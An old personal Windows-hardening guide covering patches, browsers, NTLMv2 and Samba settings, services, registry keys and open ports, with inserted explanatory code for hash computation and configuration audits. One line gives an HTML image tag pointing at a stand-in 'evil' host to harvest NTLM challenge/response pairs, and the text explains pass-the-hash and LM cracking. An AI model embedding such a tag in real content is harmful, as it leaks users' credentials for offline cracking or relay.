Secure your PC

With all the hullabaloo about the virus or worm du jour, you may want to make your Windows PC more secure. See disclaimer at end. You should also check out the Stay Smart Online site, the ASD tips and mitigations, the AusCERT Protecting info, some US-CERT publications, the NSA security guides, the NIST guides and checklists and the CIS benchmarks.


Contents


Commonsense, common settings

Anti-Virus issues

Firewall issues

E-commerce and webmail

Backups

Disable unused features

Solution?


14 Sep 16

Install Microsoft patches

The list of patches you need to install is dauntingly long; still, it is imperative to stay up-to-date with patches (but see the BEWAREs below). The last couple of patches released are:

Reference(s):
http://technet.microsoft.com/security/default
http://technet.microsoft.com/security/bulletin
http://technet.microsoft.com/security/advisory
http://blogs.technet.microsoft.com/msrc/
http://blogs.technet.microsoft.com/srd/
http://blogs.technet.microsoft.com/mmpc/

NOTE that Monthly Rollup updates are coming for Win7 and Win8.1.
BEWARE that some patches may make your machine inoperable (e.g. KB3114717, MS14-045, MS13-057 or MS13-036).
BEWARE that M$ patches do not address all known vulnerabilities.
BEWARE that installing patches or upgrading M$ software may un-install or un-do seemingly unrelated patches (e.g. re-install outdated Flash or libraries).
BEWARE that installing any patches may overwrite any customizations (may need to undo them to install the patch): re-check and re-do all your changes as below.
BEWARE that M$ often changes the underlying patches without updating the bulletins or KB articles, sometimes changing the file binaries without updating version numbers.
BEWARE that even big companies make mistakes and may release broken or unwanted patches.
NOTE that WinXP and Office2003 are now out of support, see the Support Lifecycle Index (but maybe you can get WinXP updates to 2019).

Check out the Microsoft Security Tool Kit http://www.microsoft.com/technet/security/tools/stkintro.mspx.
Beware that Microsoft Baseline Security Analyzer http://www.microsoft.com/technet/security/tools/mbsahome.mspx requires IE (with ActiveX?) and maybe other services (see http://support.microsoft.com/kb/320454) thus opening the machine up.
Note that Windows Update may have difficulties identifying what patches are already installed or are required; it needs IE and ActiveX with low security settings; it may ignore your do-not-install option; and it may not know about Office or SQL. You may also need to use Office Update and/or Microsoft Update.

USyd users please note the site licences for MS software and the local WSUS (and old SUS) server.


20 Apr 16

Do not use Internet Explorer or Edge

IE has a long history of vulnerabilities, left un-fixed for years: do not use. Note that IE is used for many registered File Types and you may want to remove them, or use regedit to search for and clobber most occurrences of iexplore. It may be best to rename the software so it is not accessible.

Use Mozilla instead.

Note that you still need to keep IE up-to-date with patches, and set secure IE options (even if you do not use IE), for the many Web-enabled applications. Windows Explorer in particular will internally handle HTTP and FTP URLs, disregarding the "URL protocol handler" in the registry, and is certainly unsafe without careful IE option settings. I wonder if Word can do JavaScript or VBS in a safe way... So occasionally you will need to rename the software back in place, patch it, start it up and set secure options, then hide it again.
To set secure options, go to Tools > Internet Options, then select Security and Advanced tabs (in Security, set things to Custom to have fun): see

You may also use third-party "IE hardeners":

IE11 (for Win8.1 then Win7) was released Oct-Nov13 with "better compatibility", "state of the art performance" and "advanced consumer security":

Support for versions prior to IE11 has ceased on 12 Jan 2016, see: https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support

In Windows10, IE is replaced by Microsoft Edge that is claimed to be more secure (e.g. note how ActiveX is termed "older, less secure").

Reference(s) (see IE history for more):


4 Apr 14

Do not use Access or Outlook (or Excel or Word)

There are bugs in MSAccess that allow the execution of any VBA macros; bugs remain in Outlook that allow execution of arbitrary code. Do not use: rename Access, Outlook and VBA (also DAO: used in ihackstuff exploit) so they are not accessible. (Do other MS Office components too: at least Excel, preferably most others even Word, at the same time.)
Use OpenOffice instead.

Reference(s):


31 Aug 16

Set Word options

Apply some protection settings in MSWord against harmful macros. (Would be tempting to disable Word along with the rest of MS Office, but...)

Reference(s):

If you use Office XP or 2003, then beware of it sending debugging information, containing your sensitive documents, to Microsoft. Use regedit to set:
for Office XP, DWNeverUpload, DWNoExternalURL, DWNoFileCollection and DWNoSecondLevelCollection to 1 in both [HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\10.0\Common] and [HKEY_USERS\.Default\Software\Policies\Microsoft\Office\10.0\Common];
for Office 2003, QMEnable to 0 in [HKEY_CURRENT_USER\Software\Policies\Microsoft\Office\Common].

Reference(s):

Apply privacy settings, or your document will contain unwanted information.

Reference(s):


9 Jan 13

Banish LanMan passwords

If you use any Windows passwords, e.g. to connect to a Samba server, then ensure that only NTLM or NTLMv2 password hashes are used. The older LM hash is insecure as it can be cracked easily: the password is upper-cased, padded to 14 characters and split into two 7-character halves, each used as an independent DES key with no salt, so an attacker cracks two small case-insensitive pieces rather than one long password. (Cracking NTLM hashes is significantly harder, see L0phtCrack, though they too are unsalted.) Both LM and NTLM hashes are replayable: there may be no need to crack them, as whoever holds the hash can authenticate with it. Windows may be tricked into authenticating to a machine of the attacker's choosing, e.g. by using  <img src=file:\\evil\pub.gif>  in an HTML email or web page, which hands the attacker a challenge/response pair to crack offline or relay. Use NTLMv2 if possible: its response is keyed to both a server challenge and a client nonce, so a captured exchange cannot be replayed. Note that NTLMv2 is still derived from the NT hash, so a stolen hash remains a password-equivalent; NTLMv2 protects the exchange on the wire, not a hash that has already leaked.
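To make the above concrete, here is an added example (not code from this page, Microsoft or Samba): it builds the two DES key halves an LM hash is made from, computes the NT hash and the NTLMv2 key and response, and shows that the NTLMv2 response changes with the server challenge. MD4 is written inline because many OpenSSL builds no longer provide it. The known-answer values come from MS-NLMP section 4.2 (user "User", domain "Domain", password "Password"); the challenge bytes and the target-info blob in the demo are constructed, and the OEM code page used for LM upper-casing (cp437) is an assumption.

```python
"""Added example (not from this page): what an LM hash is built from, and what
NTLMv2 adds.  Pure Python; MD4 is inlined because OpenSSL builds often no
longer expose it.  Known-answer values are from MS-NLMP section 4.2
(user "User", domain "Domain", password "Password"); the challenges and the
target-info blob used in the demo are constructed."""
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, little-endian words, three rounds of 16 steps."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), tuple(range(16)), (3, 7, 11, 19), 0),
        (lambda x, y, z: (x & y) | (x & z) | (y & z),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (lambda x, y, z: x ^ y ^ z,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for f, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                a = _rotl((a + f(b, c, d) + x[idx] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate roles: the next step updates old d
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def lm_key_halves(password: str) -> tuple:
    """The two 7-byte DES keys behind an LM hash: password upper-cased (OEM
    code page, cp437 assumed), padded/truncated to 14 bytes, split in two.
    Each half is encrypted separately and unsalted, so an attacker cracks two
    7-character, case-insensitive pieces.  A password of 7 characters or
    fewer leaves the second half all zero, which is why such LM hashes all
    end in the same constant (AAD3B435B51404EE)."""
    buf = password.upper().encode("cp437", "replace")[:14].ljust(14, b"\x00")
    return buf[:7], buf[7:]


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password.  Case-preserving and far
    stronger than LM against cracking, but still unsalted and, on its own,
    a password-equivalent (pass-the-hash)."""
    return md4(password.encode("utf-16le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5 over upper-cased user + domain, keyed by the NT hash."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()


def ntlmv2_blob(filetime: int, client_challenge: bytes, target_info: bytes = b"") -> bytes:
    """The client-side 'temp' blob of MS-NLMP 3.3.2: version bytes, reserved,
    timestamp, 8-byte client nonce, reserved, AV_PAIR target info, reserved."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(password, user, domain, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 over server challenge + blob.  It depends on a
    nonce from each side, so a captured response does not replay against a
    fresh challenge; note the key is still derived from the NT hash."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, "md5").digest()


if __name__ == "__main__":
    print("LM halves:", lm_key_halves("PassWord1"), "== those of PASSWORD1")
    print("NT hash of 'password':", nt_hash("password").hex())
    blob = ntlmv2_blob(0, bytes.fromhex("aaaaaaaaaaaaaaaa"))  # constructed nonce
    r1 = ntlmv2_response("Password", "User", "Domain", bytes.fromhex("0123456789abcdef"), blob)
    r2 = ntlmv2_response("Password", "User", "Domain", bytes.fromhex("fedcba9876543210"), blob)
    print("NTLMv2 response changes with the server challenge:", r1 != r2)
```

The LM half-keys are the whole story of why LM cracks so fast: two independent 7-byte DES keys from an upper-cased alphabet, no salt, so the second half of any short password is a known constant. The last two functions show what "not replayable" means in NTLMv2 terms, and equally what it does not mean: the key in ntowf_v2 comes straight from nt_hash, so protecting the stored hash matters as much as choosing the protocol level.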

Need to set my Samba server not to accept an LM hash ("lanman auth = no" in smb.conf; check also "min protocol"). This does not buy much per se: if the attacker has the LM hash, then he could crack the password and win; or he could replay the NTLM hash as he is likely to also have that. As the user is likely to have the same password elsewhere, we should protect against crackable LM hashes even if we are vulnerable to NTLM hash replays. Configure clients so they never send an LM hash; by hacking Samba to actively reject users who send an LM hash, clients can be forced to update their settings. - Samba 3.0.5 supports NTLMv2 but not message encryption (Samba 2.2.8a does not support either).
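A matching smb.conf fragment, added here as an example (not the author's own configuration): it refuses LM and plain NTLM on the server side and makes Samba's own client tools send NTLMv2. It assumes Samba 3.0 or later, where "ntlm auth" and "client ntlmv2 auth" exist; Samba 4.x additionally accepts "ntlm auth = ntlmv2-only" and SMB2/SMB3 values for "min protocol". Expect Win9x clients without the Directory Services Client (see below) to be locked out once this is in place.

```ini
[global]
   # Never accept an LM response from clients, and never send one ourselves.
   lanman auth = no
   client lanman auth = no
   # Refuse NTLM (v1) responses too: only NTLMv2 is accepted.
   ntlm auth = no
   # smbclient, winbind etc. should answer challenges with NTLMv2.
   client ntlmv2 auth = yes
   # Refuse the old dialects; on Samba 4.x raise this to SMB2_02 or later
   # once no client still needs NT1.
   min protocol = NT1
```

Test it from a client with "smbclient -L server -U user" after restarting smbd; a client still configured for LM or NTLMv1 will now fail to log in, which is the intended way to force the client-side settings to be updated.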

To use NTLMv2 authentication on Win9x, you need to install the Directory Services Client (in Clients\Win9x\Dsclient.exe on the Windows2000 Server CD). You can then un-install this client: the NTLMv2 support files will stay behind. - Seems that Win9x can only do LM or NTLMv2, and cannot do NTLM authentication (which makes sense as the only allowed values of LMCompatibility are 0 or 3). (Samba 2.2.8a and Win9x cannot communicate securely.)

Use regedit to:

Reference(s):


19 Jan 06

Disable unused services

This is a bit long... see sub-sections on services, network and registry settings, see what ports are open, and some further checking.

Services setup

Disable the services you do not need in My Computer (right-click) > Manage > Services and Applications > Services.


My WinXP home computer happily survives with just

  Name                                  Status  Startup Type

  Application Management                        Disabled
  COM+ Event System                     Started Manual
  DHCP Client                           Started Automatic
  DNS Client                            Started Automatic
  Event Log                             Started Automatic
  Human Interface Device Access                 Disabled
  LexBce Server                         Started Automatic (my Lexmark printer?)
  Messenger                                     Disabled
  Network Connections                   Started Manual
  Network Location Awareness (NLA)      Started Manual
  Plug and Play                         Started Automatic
  Print Spooler                         Started Automatic
  Protected Storage                     Started Automatic
  Remote Access Connection Manager      Started Manual
  Remote Procedure Call (RPC)           Started Automatic
  Routing and Remote Access                     Disabled
  Security Accounts Manager             Started Automatic
  Server                                Started Automatic
  SSDP Discovery Service                        Disabled
  System Event Notification             Started Manual
  Task Scheduler                                Disabled
  Telephony                             Started Manual
  Terminal Services                     Started Manual
  Windows Audio                         Started Automatic
  Windows Management Instrumentation    Started Manual
  Workstation                           Started Automatic
(rest are manual startup and not running).


My WinXP work PC (hanging off a Samba PDC) has (excessive, unsafe?)

  Name                                  Status  Startup Type

  Alerter                               Started Automatic
  Application Layer Gateway Service     Started Manual
  Automatic Updates                             Disabled
  Background Intelligent Transfer Serv          Disabled
  ClipBook                                      Disabled
  COM+ Event System                     Started Manual
  Computer Browser                      Started Automatic
  DCOM Server Process Launcher          Started Automatic
  DHCP Client                           Started Automatic
  DNS Client                                    Disabled
  Error Reporting Service                       Disabled
  Event Log                             Started Automatic
  Help and Support                              Disabled
  HID Input Service                     Started Automatic
  Messenger                             Started Automatic
  MS Software Shadow Copy Provider              Disabled
  Net Logon                             Started Automatic
  NetMeeting Remote Desktop Sharing             Disabled
  Network Connections                   Started Manual
  Network DDE                                   Disabled
  Network DDE DSDM                              Disabled
  Network Location Awareness (NLA)      Started Manual
  Performance Logs and Alerts                   Disabled
  Plug and Play                         Started Automatic
  Print Spooler                         Started Automatic
  Protected Storage                     Started Automatic
  Remote Access Auto Connection Manager         Disabled
  Remote Access Connection Manager              Disabled
  Remote Procedure Call (RPC)           Started Automatic
  Routing and Remote Access                     Disabled
  Secondary Logon                       Started Automatic
  Security Accounts Manager             Started Automatic
  Security Center                               Automatic
  Server                                Started Automatic
  Shell Hardware Detection              Started Automatic
  Smart Card                                    Disabled
  SoundMAX Agent Service                Started Automatic
  SSDP Discovery Service                        Disabled
  System Event Notification             Started Automatic
  System Restore Service                        Disabled
  Telnet                                        Disabled
  Terminal Services                     Started Manual
  Themes                                Started Automatic
  User Profile Hive Cleanup             Started Automatic
  Volume Shadow Copy                            Disabled
  WebClient                             Started Automatic
  Windows Audio                         Started Automatic
  Windows Firewall/ICS                  Started Automatic
  Windows Management Instrumentation    Started Manual
  Windows Time                          Started Automatic
  WinMonitor                            Started Automatic (home-grown management)
  Wireless Zero Configuration                   Disabled
  Workstation                           Started Automatic
(rest are manual startup and not running).


Network setup

Find your network connections (devices, interfaces) in
Start Menu > [ Settings or Control Panel ? ] > Network and Dial-up Connections
and their properties in
Local Area Connection > Properties     or
Dial-up > Properties > Networking.
Completely disable unused network interfaces, particularly wireless interfaces on itinerant laptops.
Decide if any are "trusted" networks: your dial-up internet connection is certainly un-trusted. My home PCs trust the LAN interface: my other PC (only) is on that network, and I want them to share everything.

Ensure all un-trusted connections have
File and printer sharing for Microsoft Networks
disabled. You should only have
Client for Microsoft Networks     and
Internet Protocol (TCP/IP)
listed among the protocols/services used. My home PCs show:

Dial-up, Properties, Networking, "... uses the following items":
    [x]  Internet Protocol (TCP/IP)
    [ ]  File and Printer Sharing for Microsoft Networks
    [x]  Client for Microsoft Networks

Local Area Connection, Properties, "... uses the following items":
    [x]  Client for Microsoft Networks
    [x]  File and Printer Sharing for Microsoft Networks
    [x]  Internet Protocol (TCP/IP)
while my work PC has
Local Area Connection, Properties, "... uses the following items":
    [x]  Client for Microsoft Networks
    [x]  Internet Protocol (TCP/IP)
You should enable File and printer sharing on trusted networks only, and only if you really intend to let anyone see (and delete or change) your files. (It may be possible to have sharing with controls on who can do what, but is beyond my abilities.) You may un-install File and printer sharing if no network interfaces need it. Do not delete Client for Microsoft Networks as some dial-up features rely on it.

Ensure all un-trusted connections have
Disable NetBIOS over TCP/IP
selected in Internet Protocol (TCP/IP) > Properties > Advanced > WINS.
My home PCs have more-or-less:

Dial-up, Properties, Networking, Internet Protocol (TCP/IP), Properties,
(Automatic IP and DNS), Advanced, WINS: "Disable NetBIOS over TCP/IP".

Local Area Connection, Properties, Internet Protocol (TCP/IP), Properties,
Advanced:
  IP 192.168.111.112, netmask 255.255.255.0
  Gateway (none)
  DNS server 192.168.111.111
  WINS server 192.168.111.111
  Enable NetBIOS over TCP/IP
while my work PC has
Local Area Connection, Properties, Internet Protocol (TCP/IP), Properties,
(Automatic IP and DNS), Advanced, WINS: "Use NetBIOS setting from DHCP server".


Registry setup

Use regedit to set:

 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LmCompatibilityLevel=3
 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash=1 (a DWORD on WinXP/2003; on Win2000 SP2 or later create NoLMHash as an empty subkey of Lsa instead; either way the LM hash disappears only when the password is next changed)
 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RestrictAnonymous=0 (could be 1?)
 HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\MaxWorkItems=256
 HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\SmbDeviceEnabled=0
 HKLM\SYSTEM\CurrentControlSet\Services\Rpc\Linkage\Bind=(empty, REG_MULTI_SZ or REG_SZ)
 HKLM\SYSTEM\CurrentControlSet\Services\RpcSs\ListenOnInternet=N
 HKLM\SOFTWARE\Microsoft\Ole\EnableDCOM=N
 HKLM\SOFTWARE\Microsoft\Rpc\DCOM Protocols=(not including ncacn_ip_tcp)
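A way to check these settings without clicking through regedit, added here as an example (not the author's tooling): export the keys with "reg export" and compare the dump against a baseline. The .reg text below is constructed to show compliant and non-compliant values and is not from a real machine; NoLMHash is checked in its WinXP DWORD form (an assumption), and RestrictAnonymous and MaxWorkItems are left out because the page leaves their values open.

```python
"""Added example (not from this page): audit a `reg export` dump against the
registry settings listed above.  SAMPLE_REG is constructed to show compliant
and non-compliant values; it is not from a real machine.  NoLMHash is checked
in its WinXP/2003 DWORD form (assumption); RestrictAnonymous and MaxWorkItems
are left out because the page leaves their values open."""
import re

LSA = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
NETBT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters"
RPCSS = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs"
OLE = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole"
RPC = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc"

# (key, value name) -> (predicate on the decoded value, human-readable target)
BASELINE = {
    (LSA, "LmCompatibilityLevel"): (lambda v: v == 3, "3 (send NTLMv2 only)"),
    (LSA, "NoLMHash"): (lambda v: v == 1, "1 (do not store LM hashes)"),
    (NETBT, "SmbDeviceEnabled"): (lambda v: v == 0, "0"),
    (RPCSS, "ListenOnInternet"): (lambda v: v == "N", "N"),
    (OLE, "EnableDCOM"): (lambda v: v == "N", "N"),
    (RPC, "DCOM Protocols"): (lambda v: "ncacn_ip_tcp" not in v, "no ncacn_ip_tcp"),
}

# Constructed .reg text (what `reg export` writes, minus the UTF-16 BOM).
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"LmCompatibilityLevel"=dword:00000003
"NoLMHash"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]
"SmbDeviceEnabled"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs]
"ListenOnInternet"="N"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]
"EnableDCOM"="Y"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc]
"DCOM Protocols"=hex(7):6e,00,63,00,61,00,63,00,6e,00,5f,00,69,00,70,00,5f,00,\
  74,00,63,00,70,00,00,00,6e,00,63,00,61,00,63,00,6e,00,5f,00,73,00,70,00,78,\
  00,00,00,00,00
"""


def decode_value(raw):
    """Decode the right-hand side of a .reg line: dword:, "string", or
    hex(7): (REG_MULTI_SZ as UTF-16LE, NUL-separated).  Other types are
    returned as raw text so the audit can still report them."""
    if raw.startswith("dword:"):
        return int(raw[6:], 16)
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if raw.startswith("hex(7):"):
        data = bytes(int(b, 16) for b in raw[7:].split(",") if b)
        return [s for s in data.decode("utf-16le").split("\x00") if s]
    return raw


def parse_reg(text):
    """{(key, name): value} from .reg text; continuation lines (trailing
    backslash) are joined first."""
    text = re.sub(r"\\\r?\n\s*", "", text)
    values, key = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"') and '"=' in line:
            name, _, raw = line[1:].partition('"=')
            values[(key, name)] = decode_value(raw)
    return values


def audit(values, baseline=BASELINE):
    """(key, name, status, detail) per baseline item; MISSING means the
    value is absent, i.e. the Windows default applies."""
    report = []
    for (key, name), (ok, want) in baseline.items():
        if (key, name) not in values:
            report.append((key, name, "MISSING", f"want {want}"))
        elif ok(values[(key, name)]):
            report.append((key, name, "OK", f"want {want}"))
        else:
            report.append((key, name, "BAD", f"is {values[(key, name)]!r}, want {want}"))
    return report


if __name__ == "__main__":
    for key, name, status, detail in audit(parse_reg(SAMPLE_REG)):
        print(f"{status:8} {key}\\{name}: {detail}")
```

On a real machine run "reg export" once per key (e.g. reg export HKLM\SYSTEM\CurrentControlSet\Control\Lsa lsa.reg), concatenate the files, and read them with encoding="utf-16" since the exporter writes UTF-16LE with a byte-order mark. Treat MISSING as a finding too: an absent ListenOnInternet or EnableDCOM means the permissive default is in force, which is exactly the state a patch or an upgrade may quietly return you to.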

Reference(s):

Am I now safe even without MS03-026, MS03-039, MS03-049, MS04-011 or MS04-012 patches in place? My home PC has survived Blaster, Welchia and Sasser; my office machine is behind a firewall, so has not been tested.


Ports open

My home PCs have only a few ports open:

C:\> netstat -ano
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING       4
  TCP    192.168.111.112:139    0.0.0.0:0              LISTENING       4
  UDP    0.0.0.0:1029           *:*                                    796
  UDP    192.168.111.112:137    *:*                                    4
  UDP    192.168.111.112:138    *:*                                    4
(On Win2k use just  netstat -an , or TCPView from http://www.sysinternals.com/ to show process IDs.)

TaskManager shows (among others):

Image Name      PID     User Name
SVCHOST.EXE     796     NETWORK SERVICE
System          4       SYSTEM

The line
  TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING       4
is due to the Remote Access Connection Manager service; you need it for dial-up connections (set it to disabled and reboot to see the port go away, along with your dial-up settings). This port seems harmless, not actually open as  telnet localhost 1026  fails, same as any other non-open port. (Using hping also confirms the port is not open.) Surely it is a bug in System:4 that it opens but forgets to close the port.

The line
  UDP    0.0.0.0:1029           *:*                                    796
seems to appear some minutes after boot only.

The connections shown by netstat do not change when I dial-up connect.

My work PC has open:

C:\>netstat -an
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    129.78.94.2:139        0.0.0.0:0              LISTENING
  UDP    129.78.94.2:137        *:*
  UDP    129.78.94.2:138        *:*
Maybe all those are needed...
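To avoid eyeballing netstat every time, here is an added example (not code from this page) that parses both the -ano form (WinXP, with PID) and the -an form (Win2k, no PID) shown above, keeps the listening sockets, and flags any (protocol, port) pair not on an allow-list. The two listings and the PID-to-image mapping are the ones on this page, embedded as constructed samples; the allow-list is an assumption for a stand-alone XP box, not a Microsoft baseline.

```python
"""Added example (not from this page): parse `netstat -ano` (WinXP, with PID)
or `netstat -an` (Win2k, no PID) and flag listening sockets that are not on
an allow-list.  The two listings below are the ones shown on this page,
embedded here as constructed samples; the PID map mirrors the Task Manager
view.  The allow-list is an assumption for a stand-alone XP box."""

# Constructed sample: the WinXP home PC, `netstat -ano`.
NETSTAT_ANO = """\
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:1026           0.0.0.0:0              LISTENING       4
  TCP    192.168.111.112:139    0.0.0.0:0              LISTENING       4
  UDP    0.0.0.0:1029           *:*                                    796
  UDP    192.168.111.112:137    *:*                                    4
  UDP    192.168.111.112:138    *:*                                    4
"""

# Constructed sample: the work PC, `netstat -an` (no PID column).
NETSTAT_AN = """\
Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    129.78.94.2:139        0.0.0.0:0              LISTENING
  UDP    129.78.94.2:137        *:*
  UDP    129.78.94.2:138        *:*
"""

# Task Manager on the home PC (constructed from the page).
PID_TO_IMAGE = {4: "System", 796: "SVCHOST.EXE (NETWORK SERVICE)"}

# NetBIOS/SMB only; anything else listening deserves an explanation.
EXPECTED = {("TCP", 139), ("UDP", 137), ("UDP", 138)}


def parse_netstat(text):
    """One dict per TCP/UDP line.  TCP lines carry a state column and UDP
    lines do not, so the trailing columns are read by position."""
    sockets = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        addr, port = parts[1].rsplit(":", 1)  # rsplit copes with [::]:135
        entry = {"proto": parts[0], "addr": addr, "port": int(port),
                 "foreign": parts[2], "state": None, "pid": None}
        rest = parts[3:]
        if parts[0] == "TCP" and rest:
            entry["state"] = rest.pop(0)
        if rest:
            entry["pid"] = int(rest[0])
        sockets.append(entry)
    return sockets


def listening(sockets):
    """TCP sockets in LISTENING plus every UDP socket (UDP has no state)."""
    return [s for s in sockets if s["proto"] == "UDP" or s["state"] == "LISTENING"]


def unexpected(sockets, expected=EXPECTED, pid_map=PID_TO_IMAGE):
    """Listening sockets whose (proto, port) is not allow-listed, annotated
    with the owning image when the PID is known.  A 0.0.0.0 bind is reachable
    on every interface, including the dial-up one."""
    return [(s["proto"], s["addr"], s["port"], s["pid"], pid_map.get(s["pid"], "unknown"))
            for s in listening(sockets) if (s["proto"], s["port"]) not in expected]


if __name__ == "__main__":
    for name, text in (("home", NETSTAT_ANO), ("work", NETSTAT_AN)):
        for proto, addr, port, pid, image in unexpected(parse_netstat(text)):
            print(f"{name}: {proto} {addr}:{port} pid={pid} ({image})")
```

Feed it "netstat -ano" output saved to a file and the PID map from "tasklist /svc" (which also names the services inside each svchost). Note what netstat can and cannot tell you: it shows what is bound, and on which address, but not whether a firewall in front of the socket is actually dropping the traffic.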


Further checks

Check the registry for processes started at boot or login time, ensure all are legitimately needed.

Reference(s):

I wonder if it would be possible or useful to set

 DisableIPSourceRouting=2
 EnableDeadGWDetect=0
 EnableICMPRedirect=0
 EnablePMTUDiscovery=0
 NoNameReleaseOnDemand=1
 PerformRouterDiscovery=0
 SynAttackProtect=2
in both
 HKLM\System\CurrentControlSet\Services\AFD\Parameters
 HKLM\System\CurrentControlSet\Services\Tcpip\Parameters

Reference(s):


3 Jun 16

Do not rely on WinXP/Vista/7/8/10 security

Do not assume that WinXP, Vista, Win7, 8 or 10 are secure, but expect local users to easily get "administrator" privileges: Windows has bad design, foolish defaults, and some bugs for attackers to exploit.

Still, you should not normally log in as Administrator, but as some low-privilege user; and you should protect the machine from such users, e.g. with sensible file and registry permissions. Then malware will not be able to install itself as a system service (foiling a number of viruses): see e.g.

(Power users getting admin is a "known bug" http://support.microsoft.com/kb/825069 .)

Reference(s):

I fail to see how Windows 2000 got "Common Criteria" certification. Maybe because they assume a "friendly" network and "cooperating" users ... but isn't any computer secure under those circumstances?

Reference(s):


21 Sep 16

Use Firefox 49.0, Thunderbird 45.3.0

Use Firefox 49.0 (browser) and Thunderbird 45.3.0 (mail client). Mozilla is actively maintained, free of old known bugs.

As mentioned above: turn Java off in Tools > Options > Content.

Reference(s):


Netscape Navigator has reached End of Support and they recommend to use Firefox.

Or you may want to use Chrome or Opera or Safari (all have security problems, I just do not keep track of those).


12 Aug 16

Use Acrobat XI 11.0.17

There are vulnerabilities in older Acrobat reader versions, maybe fixed in 11.0.17: see http://get.adobe.com/reader/otherversions (and FTP site).

BEWARE: PDF files may carry active content, so are also dangerous. In Edit > Preferences set:

See also the NSA "Recommendations for Configuring Adobe Acrobat Reader XI in a Windows Environment".

Reference(s):


12 Jun 07

Do not use Eudora

Eudora version 6.2.1 was released 21 Jan 05; the release notes said the attachment spoof issue was fixed. Then 6.2.3 was released 17 Jun 05 ... and 7.1 on 11 Oct 06 (no new security issues mentioned in the release notes); should do a "regression test" but have not yet (and may never get around to: we at Maths do not use Eudora anymore).
Use Mozilla instead. Note also that Eudora will become free, open-source and Mozilla-based sometime in 2007, see http://www.eudora.com/faq/, http://www.mozilla.com/press/mozilla-2006-10-11.html and http://wiki.mozilla.org/Penelope; I hope it will be "safe" then.

With its penchant to pre-extract attachments, Eudora is a prime carrier to inject arbitrary code into IE's fatuously trusted zone of local files.

The "file URL buffer overflow" bug (exploitable to execute arbitrary code, verified on versions 5.2.1, 6.0.3 and 6.1) seems fixed since 6.1.1.
The "long spoofed attachment name" buffer overflow (exploitable to execute arbitrary code in versions 5.2.1 and 6.0) seems fixed in 6.0.1 and 6.0.3, was un-fixed (exploitable) in 6.1, then seems fixed again since 6.1.1.
The X - X.exe dichotomy issue seemed fixed in 6.0 to 6.1 (though LaunchProtect worked within the  attach  folder only), was un-fixed (broken) in 6.1.1, then seems fixed again since 6.1.2.
Eudora 5.2.1 was vulnerable to the "evil IMAP server" exploit: connect to trusted servers only. Do not know if this was fixed in 6.0.

If you still insist on using Eudora, you must disable both Allow executables in HTML content and Use Microsoft's viewer in Tools > Options > Viewing Mail; you may also want to disable Automatically download HTML graphics in Tools > Options > Display. I am not sure if setting the attachment directory to be non-executable is useful.

Reference(s):


28 Sep 16

Third party software

Need to keep various other third party software updated.
See sub-sections on Java,
messengers AIM, MSN, YIM, ICQ, mIRC, Skype
and media players RealPlayer, Winamp, Windows Media Player, QuickTime, Flash.

The list here is not exhaustive, covering only the common software I knew about, and is not in order of importance. Some software (IE, Firefox, MSWord, Acrobat, Eudora) is singled out elsewhere.


